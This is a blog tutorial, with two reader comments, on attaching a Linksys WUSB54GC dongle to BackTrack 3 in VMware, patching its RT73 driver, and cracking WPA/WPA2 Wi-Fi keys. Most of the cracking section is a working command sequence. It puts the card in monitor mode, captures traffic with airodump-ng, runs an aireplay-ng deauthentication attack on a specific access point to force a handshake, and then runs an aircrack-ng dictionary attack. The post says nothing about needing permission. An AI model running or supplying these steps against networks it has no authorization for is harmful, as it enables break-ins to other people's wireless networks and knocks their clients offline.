BT3 in VMware does not have internet connectivity, what should i do?
VMware itself have limitation on using internal/external devices such PCMCIA/PCI/PCI-Express but allow USB insertion. Therefore, get yourself a USB dongle that allow us to get connected to the net. We have a lot choices on USB dongle model that works on BT3, and I choose Alfa Network AWUS036H (RTL8187L) & Linksys WUSB54GC (RT73). In this post, I will show an example on how to use a Linksys WUSB54GC card with BT3.
How to connect Linksys WUSB54GC with my BT3 in VMware?
VMware will not automatically connect any external devices. To begin, load your BT3 completely, plug-in the Linksys WUSB54GC on the USB port. Now click on Vmware menu VM > Removable Devices > USB Devices > Linksys USB Device (Port 1). You are now ready to use the device and connected to the internet without installing any drivers for it. WUSB54GC card works out of the box in BT3.
How to make sure that the device is connected?
Open shell konsole in BT3, type ifconfig -a and you should see rausb0 for Linksys WUSB54GC [If you are using Alfa AWUS036H, you should see wlan0] ;
Is it possible to crack wireless connection with Linksys WUSB54GC and how to start?
Absolutely, to begin, we have to get some updates on the driver which is Ralink RT73 chipset for Linksys WUSB54GC and BT3 kernel. Open shell konsole, type
bt ~ # wget http://homepages.tu-darmstadt.de/~p_larbig/wlan/rt73-k2wrlz-3.0.1.tar.bz2
bt ~ # wget http://www.offensive-security.com/kernel.lzm, you should see this,
You may also get other drivers for different USB dongle model at http://homepages.tu-darmstadt.de/~p_larbig/wlan/
Note that the driver version is 3.0.1 and the format is *.bz2. We need to extract the file, on the same konsole, type
bt ~ # tar -xvjf rt73-k2wrlz-3.0.1.tar.bz2
bt ~ # ifconfig rausb0 down
bt ~ # lzm2dir kernel.lzm /
After that, we navigate to the extracted files, by typing
bt ~ # cd rt73-k2wrlz-3.0.1/Module
bt Module # make
bt Module # make install
bt Module # cd
bt ~ # modprobe rt73
bt ~ # ifconfig rausb0 up
Therefore, we are ready to crack some wireless line within certain distance. In this example, we are trying to crack WPA/WPA2 networks. Continue,
bt ~ # iwconfig rausb0 mode monitor rate 1M
bt ~ # iwconfig
Up until here, you will see rausb0 with bit rate=1Mb/s, cont.,
bt ~ # iwpriv forceprism 1
forceprism no private ioctls
bt ~ # iwpriv rausb0 forceprism 1
bt ~ # iwpriv rausb0 rfmontx 1
bt ~ # airodump-ng rausb0
Then, CTRL+C to stop, now we have an AP has essid called home with the MAC address 00:1D:7E:64:88:B5 on channel 11, so on new konsole we type,
bt ~ # airodump-ng -c 11 -w /tmp/dmp rausb0
As for now, wait for 10seconds to make sure WPA Handshake appear on the top right side of the konsole. If it does not appear, follow step (1) cont. with step (2), if it does follow step (2) and ignore the step (1),
Step (1),
Open new shell konsole, type,
bt ~ # aireplay-ng 0 -5 -a 00:1D:7E:64:88:B5 rausb0
The 00:1D:7E:64:88:B5 is the AP MAC address. As you activate this command, notice the first konsole will have WPA handshake on top right.
Step (2),
Now we get our WPA handshake, press CTRL+C, as for WPA/WPA2 cracking, number of packets does not mean anything for the cracking purpose. Open new konsole,
bt ~ # aircrack-ng -w mangled.lst -b 00:1D:7E:64:88:B5 /tmp/dmp-01.cap
The mangled.lst is a dictionary file and it could be any name depending on your dictionary file, and the 00:1D:7E:64:88:B5 is the AP MAC address. You should see a calculating window once you execute this command such below image,
Are there any different between WPA and WPA2 cracking?
No. Same method of cracking is applied for both type of encryption.
Should I stop cracking calculation if the AP is off?
No, because we are cracking offline. You may continue until key is obtained.
Do you have video approach about cracking WEP/WPA?
Yep, you may download some of my vids HERE.
2 comments:
25 November, 2010 03:58
"all scenario here is applied in VMware Workstation in F80S"
what is F80S???
22 December, 2010 01:33
Hi there, F80S is an Asus laptop model, I found that there is a problem to have a dual installation of BT with an Asus F80S model laptop. Anyway, by using VMware, you no longer require to have a dual boot setting to run BT. By using Vmware, everything is easy. This post is an old BT series on how to crack wireless with WUSB54GC USB dongle. There is an issue happen during that moment, everything is quite automatic on the latest series of BT right now.
Post a Comment